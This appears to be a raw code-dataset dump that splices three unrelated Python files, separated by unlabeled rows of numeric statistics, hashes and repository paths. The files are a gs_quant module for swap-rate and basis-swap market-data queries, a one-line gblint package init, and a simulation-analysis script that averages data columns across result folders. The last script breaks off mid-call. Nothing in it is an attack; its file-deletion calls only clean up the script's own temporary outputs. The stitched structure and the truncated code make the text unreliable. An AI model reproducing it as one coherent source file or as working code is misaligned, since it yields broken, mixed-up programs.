""" Copyright 2020 Goldman Sachs. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import logging import re from typing import Optional import datetime import pandas as pd from pandas import Series from gs_quant.api.gs.assets import GsAssetApi from gs_quant.api.gs.data import QueryType, GsDataApi from gs_quant.data import DataContext from gs_quant.errors import MqValueError from gs_quant.datetime.gscalendar import GsCalendar from gs_quant.markets.securities import AssetIdentifier, Asset from gs_quant.target.common import Currency as CurrencyEnum, PricingLocation, AssetClass, AssetType, FieldFilterMap from gs_quant.timeseries import ASSET_SPEC, BenchmarkType, plot_measure, MeasureDependency, GENERIC_DATE from gs_quant.timeseries.helper import _to_offset from gs_quant.timeseries.measures import _asset_from_spec, _market_data_timed, _range_from_pricing_date, \ _get_custom_bd _logger = logging.getLogger(__name__) CURRENCY_TO_SWAP_RATE_BENCHMARK = { 'CHF': {'LIBOR': 'CHF-LIBOR-BBA', 'SARON': 'CHF-SARON-OIS-COMPOUND'}, 'EUR': {'EURIBOR': 'EUR-EURIBOR-Telerate', 'EONIA': 'EUR-EONIA-OIS-COMPOUND'}, 'GBP': {'LIBOR': 'GBP-LIBOR-BBA', 'SONIA': 'GBP-SONIA-COMPOUND'}, 'JPY': {'LIBOR': 'JPY-LIBOR-BBA', 'TONA': 'JPY-TONA-OIS-COMPOUND'}, 'SEK': {'STIBOR': 'SEK-STIBOR-SIDE'}, 'USD': {'LIBOR': 'USD-LIBOR-BBA', 'Fed_Funds': 'USD-Federal Funds-H.15-OIS-COMP', 'SOFR': 'USD-SOFR-COMPOUND'} } BENCHMARK_TO_DEFAULT_FLOATING_RATE_TENORS = { 'CHF-LIBOR-BBA': '6m', 'CHF-SARON-OIS-COMPOUND': '1y', 'EUR-EURIBOR-Telerate': '6m', 'EUR-EONIA-OIS-COMPOUND': '1y', 'GBP-LIBOR-BBA': '6m', 'GBP-SONIA-COMPOUND': '1y', 'JPY-LIBOR-BBA': '6m', 'JPY-TONA-OIS-COMPOUND': '1y', 'SEK-STIBOR-SIDE': '6m', 'USD-LIBOR-BBA': '3m', 'USD-Federal Funds-H.15-OIS-COMP': '1y', 'USD-SOFR-COMPOUND': '1y' } def _currency_to_mdapi_swap_rate_asset(asset_spec: ASSET_SPEC) -> str: asset = _asset_from_spec(asset_spec) bbid = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) # for each currency, get a dummy asset for checking availability if bbid == 'CHF': result = 'MAW25BGQJH9P6DPT' elif bbid == 'EUR': result = 'MAA9MVX15AJNQCVG' elif bbid == 'GBP': result = 'MA6QCAP9B7ABS9HA' elif bbid == 'JPY': result = 'MAEE219J5ZP0ZKRK' elif bbid == 'SEK': result = 'MAETMVTPNP3199A5' elif bbid == 'USD': result = 'MAFRSWPAF5QPNTP2' else: return asset.get_marquee_id() return result def _currency_to_mdapi_basis_swap_rate_asset(asset_spec: ASSET_SPEC) -> str: asset = _asset_from_spec(asset_spec) bbid = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) # for each currency, get a dummy asset for checking availability if bbid == 'EUR': result = 'MAGRG2VT11GQ2RQ9' elif bbid == 'GBP': result = 'MAHCYNB3V75JC5Q8' elif bbid == 'JPY': result = 'MAXVRBEZCJVH0C4V' elif bbid == 'USD': result = 'MAQB1PGEJFCET3GG' else: return asset.get_marquee_id() return result def _convert_asset_for_mdapi_swap_rates(**kwargs) -> str: assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) > 1: raise MqValueError('Specified arguments match multiple assets') elif len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: return assets[0].id def check_forward_tenor(forward_tenor) -> GENERIC_DATE: if isinstance(forward_tenor, datetime.date): return forward_tenor elif forward_tenor is None or forward_tenor == 'Spot': return '0b' elif not (re.fullmatch('(\\d+)([bdwmy])', forward_tenor) or re.fullmatch('(imm[1-4]|frb[1-9])', forward_tenor)): raise MqValueError('invalid forward tenor ' + forward_tenor) else: return forward_tenor def _check_benchmark_type(currency, benchmark_type): if benchmark_type is not None and \ benchmark_type.value not in CURRENCY_TO_SWAP_RATE_BENCHMARK[currency.value].keys(): raise MqValueError('%s is not supported for %s', benchmark_type, currency.value) def _get_swap_leg_defaults(currency: CurrencyEnum, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None) -> dict: if currency == CurrencyEnum.JPY: pricing_location = PricingLocation.TKO elif currency == CurrencyEnum.USD: pricing_location = PricingLocation.NYC else: pricing_location = PricingLocation.LDN # default benchmark types if benchmark_type is None: if currency == CurrencyEnum.EUR: benchmark_type = BenchmarkType.EURIBOR elif currency == CurrencyEnum.SEK: benchmark_type = BenchmarkType.STIBOR else: benchmark_type = BenchmarkType.LIBOR benchmark_type_input = CURRENCY_TO_SWAP_RATE_BENCHMARK[currency.value][benchmark_type.value] # default floating index if floating_rate_tenor is None: floating_rate_tenor = BENCHMARK_TO_DEFAULT_FLOATING_RATE_TENORS[benchmark_type_input] return dict(currency=currency, benchmark_type=benchmark_type_input, floating_rate_tenor=floating_rate_tenor, pricing_location=pricing_location) @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_swap_rate_asset, query_type=QueryType.SWAP_RATE)]) def swap_rate_2(asset: Asset, swap_tenor: str, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False) -> Series: """ GS end-of-day Fixed-Floating interest rate swap (IRS) curves across major currencies. :param asset: asset object loaded from security master :param swap_tenor: relative date representation of expiration date e.g. 1m :param benchmark_type: benchmark type e.g. LIBOR :param floating_rate_tenor: floating index rate :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP', 'CHF', 'SEK']: raise NotImplementedError('Data not available for {} swap rates'.format(currency.value)) _check_benchmark_type(currency, benchmark_type) defaults = _get_swap_leg_defaults(currency, benchmark_type, floating_rate_tenor) if not (re.fullmatch('(\\d+)([bdwmy])', swap_tenor) or re.fullmatch('(frb[1-9])', forward_tenor)): raise MqValueError('invalid swap tenor ' + swap_tenor) if not re.fullmatch('(\\d+)([bdwmy])', defaults['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + defaults['floating_rate_tenor'] + ' for index: ' + defaults['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) clearing_house = 'LCH' csaTerms = currency.value + '-1' fixed_rate = 'ATM' kwargs = dict(type='Swap', asset_parameters_termination_date=swap_tenor, asset_parameters_floating_rate_option=defaults['benchmark_type'], asset_parameters_fixed_rate=fixed_rate, asset_parameters_clearing_house=clearing_house, asset_parameters_floating_rate_designated_maturity=defaults['floating_rate_tenor'], asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=defaults['pricing_location'].value) rate_mqid = _convert_asset_for_mdapi_swap_rates(**kwargs) _logger.debug('where asset= %s, swap_tenor=%s, benchmark_type=%s, floating_rate_tenor=%s, forward_tenor=%s, ' 'pricing_location=%s', rate_mqid, swap_tenor, defaults['benchmark_type'], defaults['floating_rate_tenor'], forward_tenor, defaults['pricing_location'].value) where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query([rate_mqid], QueryType.SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) return Series() if df.empty else df['swapRate'] @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_basis_swap_rate_asset, query_type=QueryType.BASIS_SWAP_RATE)]) def basis_swap_spread(asset: Asset, swap_tenor: str = '1y', spread_benchmark_type: BenchmarkType = None, spread_tenor: str = None, reference_benchmark_type: BenchmarkType = None, reference_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False, ) -> Series: """ GS end-of-day Floating-Floating interest rate swap (IRS) curves across major currencies. :param asset: asset object loaded from security master :param swap_tenor: relative date representation of expiration date e.g. 1m :param spread_benchmark_type: benchmark type of spread leg on which basis spread is added e.g. LIBOR :param spread_tenor: relative date representation of expiration date of paying leg e.g. 1m :param reference_benchmark_type: benchmark type of reference leg e.g. LIBOR :param reference_tenor: relative date representation of expiration date of reference leg e.g. 1m :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime basis_swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP']: raise NotImplementedError('Data not available for {} basis swap rates'.format(currency.value)) for benchmark_type in [spread_benchmark_type, reference_benchmark_type]: _check_benchmark_type(currency, benchmark_type) if not (re.fullmatch('(\\d+)([bdwmy])', swap_tenor) or re.fullmatch('(frb[1-9])', forward_tenor)): raise MqValueError('invalid swap tenor ' + swap_tenor) # default benchmark types legs_w_defaults = dict() legs_w_defaults['spread'] = _get_swap_leg_defaults(currency, spread_benchmark_type, spread_tenor) legs_w_defaults['reference'] = _get_swap_leg_defaults(currency, reference_benchmark_type, reference_tenor) for key, leg in legs_w_defaults.items(): if not re.fullmatch('(\\d+)([bdwmy])', leg['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + leg['floating_rate_tenor'] + ' index: ' + leg['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) csaTerms = currency.value + '-1' clearing_house = 'LCH' kwargs = dict(type='BasisSwap', asset_parameters_termination_date=swap_tenor, asset_parameters_payer_rate_option=legs_w_defaults['spread']['benchmark_type'], asset_parameters_payer_designated_maturity=legs_w_defaults['spread']['floating_rate_tenor'], asset_parameters_receiver_rate_option=legs_w_defaults['reference']['benchmark_type'], asset_parameters_receiver_designated_maturity=legs_w_defaults['reference']['floating_rate_tenor'], asset_parameters_clearing_house=clearing_house, asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=legs_w_defaults['spread']['pricing_location'].value) rate_mqid = _convert_asset_for_mdapi_swap_rates(**kwargs) _logger.debug('where asset=%s, swap_tenor=%s, spread_benchmark_type=%s, spread_tenor=%s, ' 'reference_benchmark_type=%s, reference_tenor=%s, forward_tenor=%s, pricing_location=%s ', rate_mqid, swap_tenor, legs_w_defaults['spread']['benchmark_type'], legs_w_defaults['spread']['floating_rate_tenor'], legs_w_defaults['reference']['benchmark_type'], legs_w_defaults['reference']['floating_rate_tenor'], forward_tenor, legs_w_defaults['spread']['pricing_location'].value) where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query([rate_mqid], QueryType.BASIS_SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) return Series() if df.empty else df['basisSwapRate'] @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_swap_rate_asset, query_type=QueryType.SWAP_RATE)]) def swap_term_structure(asset: Asset, benchmark_type: BenchmarkType = None, floating_rate_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, pricing_date: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False) -> Series: """ GS end-of-day Fixed-Floating interest rate swap (IRS) term structure across major currencies. :param asset: asset object loaded from security master :param benchmark_type: benchmark type e.g. LIBOR :param floating_rate_tenor: floating index rate :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param pricing_date: YYYY-MM-DD or relative date :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate term structure """ if real_time: raise NotImplementedError('realtime swap_rate not implemented') currency = asset.get_identifier(AssetIdentifier.BLOOMBERG_ID) currency = CurrencyEnum(currency) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP', 'CHF', 'SEK']: raise NotImplementedError('Data not available for {} swap rates'.format(currency.value)) clearing_house = 'LCH' _check_benchmark_type(currency, benchmark_type) forward_tenor = check_forward_tenor(forward_tenor) defaults = _get_swap_leg_defaults(currency, benchmark_type, floating_rate_tenor) if not re.fullmatch('(\\d+)([bdwmy])', defaults['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + defaults['floating_rate_tenor'] + ' for index: ' + defaults['benchmark_type']) calendar = defaults['pricing_location'].value if pricing_date is not None and pricing_date in list(GsCalendar.get(calendar).holidays): raise MqValueError('Specified pricing date is a holiday in {} calendar'.format(calendar)) csaTerms = currency.value + '-1' fixed_rate = 'ATM' kwargs = dict(type='Swap', asset_parameters_floating_rate_option=defaults['benchmark_type'], asset_parameters_fixed_rate=fixed_rate, asset_parameters_clearing_house=clearing_house, asset_parameters_floating_rate_designated_maturity=defaults['floating_rate_tenor'], asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=defaults['pricing_location'].value) assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: rate_mqids = [asset.id for asset in assets] asset_string = '' for mqid in rate_mqids: asset_string = asset_string + ',' + mqid _logger.debug('assets returned %s', asset_string) _logger.debug('where benchmark_type=%s, floating_rate_tenor=%s, forward_tenor=%s, ' 'pricing_location=%s', defaults['benchmark_type'], defaults['floating_rate_tenor'], forward_tenor, defaults['pricing_location'].value) start, end = _range_from_pricing_date(calendar, pricing_date) with DataContext(start, end): where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query(rate_mqids, QueryType.SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) if df.empty: return pd.Series() latest = df.index.max() _logger.info('selected pricing date %s', latest) df = df.loc[latest] business_day = _get_custom_bd(calendar) df = df.assign(expirationDate=df.index + df['terminationTenor'].map(_to_offset) + business_day - business_day) df = df.set_index('expirationDate') df.sort_index(inplace=True) df = df.loc[DataContext.current.start_date: DataContext.current.end_date] return df['swapRate'] if not df.empty else pd.Series() @plot_measure((AssetClass.Cash,), (AssetType.Currency,), [MeasureDependency(id_provider=_currency_to_mdapi_basis_swap_rate_asset, query_type=QueryType.BASIS_SWAP_RATE)]) def basis_swap_term_structure(asset: Asset, spread_benchmark_type: BenchmarkType = None, spread_tenor: str = None, reference_benchmark_type: BenchmarkType = None, reference_tenor: str = None, forward_tenor: Optional[GENERIC_DATE] = None, pricing_date: Optional[GENERIC_DATE] = None, *, source: str = None, real_time: bool = False, ) -> Series: """ GS end-of-day Floating-Floating interest rate swap (IRS) term structure across major currencies. :param asset: asset object loaded from security master :param spread_benchmark_type: benchmark type of spread leg on which basis spread is added e.g. LIBOR :param spread_tenor: relative date representation of expiration date of spread leg e.g. 1m :param reference_benchmark_type: benchmark type of reference leg e.g. LIBOR :param reference_tenor: relative date representation of expiration date of reference leg e.g. 1m :param forward_tenor: absolute / relative date representation of forward starting point eg: '1y' or 'Spot' for spot starting swaps, 'imm1' or 'frb1' :param pricing_date: YYYY-MM-DD or relative date :param source: name of function caller :param real_time: whether to retrieve intraday data instead of EOD :return: swap rate curve """ if real_time: raise NotImplementedError('realtime basis_swap_rate not implemented') currency = CurrencyEnum(asset.get_identifier(AssetIdentifier.BLOOMBERG_ID)) if currency.value not in ['JPY', 'EUR', 'USD', 'GBP']: raise NotImplementedError('Data not available for {} basis swap rates'.format(currency.value)) for benchmark_type in [spread_benchmark_type, reference_benchmark_type]: _check_benchmark_type(currency, benchmark_type) # default benchmark types legs_w_defaults = dict() legs_w_defaults['spread'] = _get_swap_leg_defaults(currency, spread_benchmark_type, spread_tenor) legs_w_defaults['reference'] = _get_swap_leg_defaults(currency, reference_benchmark_type, reference_tenor) for key, leg in legs_w_defaults.items(): if not re.fullmatch('(\\d+)([bdwmy])', leg['floating_rate_tenor']): raise MqValueError('invalid floating rate tenor ' + leg['floating_rate_tenor'] + ' index: ' + leg['benchmark_type']) forward_tenor = check_forward_tenor(forward_tenor) calendar = legs_w_defaults['spread']['pricing_location'].value if pricing_date is not None and pricing_date in list(GsCalendar.get(calendar).holidays): raise MqValueError('Specified pricing date is a holiday in {} calendar'.format(calendar)) csaTerms = currency.value + '-1' clearing_house = 'LCH' kwargs = dict(type='BasisSwap', asset_parameters_payer_rate_option=legs_w_defaults['spread']['benchmark_type'], asset_parameters_payer_designated_maturity=legs_w_defaults['spread']['floating_rate_tenor'], asset_parameters_receiver_rate_option=legs_w_defaults['reference']['benchmark_type'], asset_parameters_receiver_designated_maturity=legs_w_defaults['reference']['floating_rate_tenor'], asset_parameters_clearing_house=clearing_house, asset_parameters_effective_date=forward_tenor, asset_parameters_notional_currency=currency.name, pricing_location=legs_w_defaults['spread']['pricing_location'].value) assets = GsAssetApi.get_many_assets(**kwargs) if len(assets) == 0: raise MqValueError('Specified arguments did not match any asset in the dataset') else: rate_mqids = [asset.id for asset in assets] asset_string = '' for mqid in rate_mqids: asset_string = asset_string + ',' + mqid _logger.debug('assets returned %s', asset_string) _logger.debug('where spread_benchmark_type=%s, spread_tenor=%s, reference_benchmark_type=%s, ' 'reference_tenor=%s, forward_tenor=%s, pricing_location=%s ', legs_w_defaults['spread']['benchmark_type'], legs_w_defaults['spread']['floating_rate_tenor'], legs_w_defaults['reference']['benchmark_type'], legs_w_defaults['reference']['floating_rate_tenor'], forward_tenor, legs_w_defaults['spread']['pricing_location'].value) start, end = _range_from_pricing_date(calendar, pricing_date) with DataContext(start, end): where = FieldFilterMap(csaTerms=csaTerms) q = GsDataApi.build_market_data_query(rate_mqids, QueryType.BASIS_SWAP_RATE, where=where, source=source, real_time=real_time) _logger.debug('q %s', q) df = _market_data_timed(q) if df.empty: return pd.Series() latest = df.index.max() _logger.info('selected pricing date %s', latest) df = df.loc[latest] business_day = _get_custom_bd(calendar) df = df.assign(expirationDate=df.index + df['terminationTenor'].map(_to_offset) + business_day - business_day) df = df.set_index('expirationDate') df.sort_index(inplace=True) df = df.loc[DataContext.current.start_date: DataContext.current.end_date] return df['basisSwapRate'] if not df.empty else pd.Series()
49.398323
120
0.699444
2,920
23,563
5.378082
0.113356
0.062086
0.040053
0.018148
0.808456
0.794193
0.781712
0.763054
0.757387
0.73962
0
0.005254
0.200272
23,563
476
121
49.502101
0.828115
0.155668
0
0.591331
0
0.003096
0.177907
0.014342
0
0
0
0
0
1
0.03096
false
0
0.049536
0
0.126935
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
899fd6e02e132125d48ba53f37d7d830846cebde
22
py
Python
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
1
2020-08-10T18:54:51.000Z
2020-08-10T18:54:51.000Z
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
null
null
null
gblint/__init__.py
avoceteditors/gblint
7935e58a1e744931fd70170fe0db3d9664b8a9a5
[ "BSD-3-Clause" ]
null
null
null
from .core import run
11
21
0.772727
4
22
4.25
1
0
0
0
0
0
0
0
0
0
0
0
0.181818
22
1
22
22
0.944444
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
98363093fca20b74b1c9711df2c6a9342585c0ff
17,994
py
Python
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
2
2021-03-02T21:46:56.000Z
2021-06-30T03:12:07.000Z
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
null
null
null
simulation-bin/run_binary_paper2/priming_and_activation/averageFileColumnsAdvancedMod.py
jlubo/memory-consolidation-stc
f9934760e12de324360297d7fc7902623169cb4d
[ "Apache-2.0" ]
3
2021-03-22T12:56:52.000Z
2021-09-13T07:42:36.000Z
############################################################################################## ### Script to average data from the same columns in data files stored in different folders ### ############################################################################################## ### Copyright 2017-2021 Jannik Luboeinski ### licensed under Apache-2.0 (http://www.apache.org/licenses/LICENSE-2.0) import numpy as np import os from pathlib import Path from mergeRawData import * # averageFileColumns # Averages specified data columns across data files located in directories which names contain a specific string # and computes the standard deviation # outname: name of the file to write the averaged data to # rootpath: path in which to look for data folders # protocol: string that the data folders have to contain # suffix: suffix in the filename of data files to be read # columns: list of numbers of the columns in the data file to be read and averaged (e.g., [1, 3] for first and third column) # first_column_par [optional]: indicates if first column is to be treated as parameter (e.g., time) - it is then added regardless of 'columns' # comment_line [optional]: if True, leaves out the first line def averageFileColumns(outname, rootpath, protocol, suffix, columns, first_column_par=True, comment_line=False): print("Averaging columns " + str(columns) + " from files matching '*" + suffix + "' in folders of the protocol '" + protocol + "'...") sample_number = 0 col_sep = '= ' #'\t\t' character(s) separating the columns # find the folders with the protocol in their name rawpaths = Path(rootpath) paths = np.array([str(x) for x in rawpaths.iterdir() if x.is_dir() and protocol in str(x)]) if paths.size == 0: raise FileNotFoundError("No folders found that contain the string '" + protocol + "' in their name.") print("According folders found:\n", paths) # read data and average # loop over directories for i in range(paths.size): # find the files with the suffix in their name subrawpaths = Path(paths[i]) subpaths = np.array([str(x) for x in subrawpaths.iterdir() if str(x).find(suffix) >= len(str(x))-len(suffix)]) if subpaths.size == 0: raise FileNotFoundError("No files found matching '*" + suffix + "' in '" + paths[i] + "'.") print("According files found in '" + paths[i] + "':\n", subpaths) sample_number += subpaths.size # loop over files in each directory for j in range(subpaths.size): with open(subpaths[j]) as f: rawdata = f.read() rawdata = rawdata.split('\n') if comment_line: del rawdata[0] # leave out comment line if rawdata[-1] == "": del rawdata[-1] # delete empty line if i == 0 and j == 0: # first file found: read number of rows and create data arrays num_rows = len(rawdata) num_cols = len(columns) time = np.zeros(num_rows) data = np.zeros((num_rows, num_cols)) data_var = np.zeros((num_rows, num_cols)) elif num_rows != len(rawdata): raise IndexError("In '" + subpaths[j] + "': wrong number of rows: " + str(len(rawdata)-1) + " (" + str(num_rows) + " expected).") for k in range(num_rows): values = rawdata[k].split(col_sep) if len(values) < 2: values = [np.nan,np.nan] # to avoid problems reading descriptions try: time[k] += np.double(values[0]) # read first/parameter column except ValueError: pass#print("Computing mean: conversion error in line " + str(k+1) + ", column 1\n\tin '" + subpaths[j] + "'.") for l in range(num_cols): try: data[k][l] += np.double(values[columns[l]-1]) # read data columns except ValueError: pass#print("Computing mean: conversion error in line " + str(k+1) + ", column " + str(columns[l]) + "\n\tin '" + subpaths[j] + "'.") f.close() time = time / sample_number data = data / sample_number # read data and compute variance # loop over directories for i in range(paths.size): # loop over files in each directory for j in range(subpaths.size): with open(subpaths[j]) as f: rawdata = f.read() rawdata = rawdata.split('\n') if comment_line: del rawdata[0] # leave out comment line if rawdata[-1] == "": del rawdata[-1] # delete empty line for k in range(num_rows): values = rawdata[k].split(col_sep) #if len(values) < 2: # values = [np.nan,np.nan] # to avoid problems reading descriptions for l in range(num_cols): try: data_var[k][l] += np.power(np.double(values[columns[l]-1])-data[k][l], 2) # read data columns except: pass#print("Computing variance: conversion error in line " + str(k+1) + ", column " + str(columns[l]) + "\n\tin '" + subpaths[j] + "'.") #except IndexError: # print("INDEX ERROR") f.close() data_stdev = np.sqrt(data_var / (sample_number - 1)) # write averaged data fout = open(outname + '.txt', 'w') for k in range(num_rows): ## ADAPTED if k >=4 and k <=7: # only need those four rows! for l in range(num_cols): fout.write(str(data[k][l]) + "\t" + str(data_stdev[k][l])) if (k+1) % 4 == 0 and l >= num_cols-1: # after the last column and after 4 rows have been clutched together fout.write("\n") else: # as long as last column is not yet reached fout.write("\t") fout.close() f = open("p_act_summary_temp_0names.txt", "w") f.write("NOOVERLAP, A primed\n") f.write("NOOVERLAP, B primed\n") f.write("NOOVERLAP, C primed\n") f.write("OVERLAP10, A primed\n") f.write("OVERLAP10, B primed\n") f.write("OVERLAP10, C primed\n") f.write("OVERLAP10 no AC, no ABC, A primed\n") f.write("OVERLAP10 no AC, no ABC, B primed\n") f.write("OVERLAP10 no AC, no ABC, C primed\n") f.write("OVERLAP10 no BC, no ABC, A primed\n") f.write("OVERLAP10 no BC, no ABC, B primed\n") f.write("OVERLAP10 no BC, no ABC, C primed\n") f.close() # 10 min averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/OVERLAP10 no AC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10_noAC_noABC.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "2. Switching after 10 min/OVERLAP10 no BC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "2. Switching after 10 min/OVERLAP10 no BC, no ABC/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "2. Switching after 10 min/OVERLAP10 no BC, no ABC/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_10min_OVERLAP10_noBC_noABC.txt", remove_raw=True, sep_str='\n') os.system('cat "p_act_10min_NOOVERLAP.txt" > "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10.txt" >> "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10_noAC_noABC.txt" >> "p_act_summary_temp_10min.txt"') os.system('cat "p_act_10min_OVERLAP10_noBC_noABC.txt" >> "p_act_summary_temp_10min.txt"') os.system('rm -R -f "p_act_10min"*') mergeRawData(".", "p_act_summary_temp_", "p_act_summary_10min.txt", remove_raw=False, sep_str='\t') # remove_raw=False to keep _temp_0names file os.system('rm -f p_act_summary_temp_10min.txt') # 1 h averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/NOOVERLAP/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/NOOVERLAP/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/NOOVERLAP/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_NOOVERLAP.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Bprimed", "3. Switching after 1 h/OVERLAP10/B", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) averageFileColumns("p_act_averaged_Cprimed", "3. Switching after 1 h/OVERLAP10/C", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", [2], first_column_par=False) mergeRawData(".", "p_act_averaged_", "p_act_1h_OVERLAP10.txt", remove_raw=True, sep_str='\n') averageFileColumns("p_act_averaged_Aprimed", "3. Switching after 1 h/OVERLAP10 no AC, no ABC/A", "avalanche_statistics_0.01_10", "_CA_probabilities.txt", 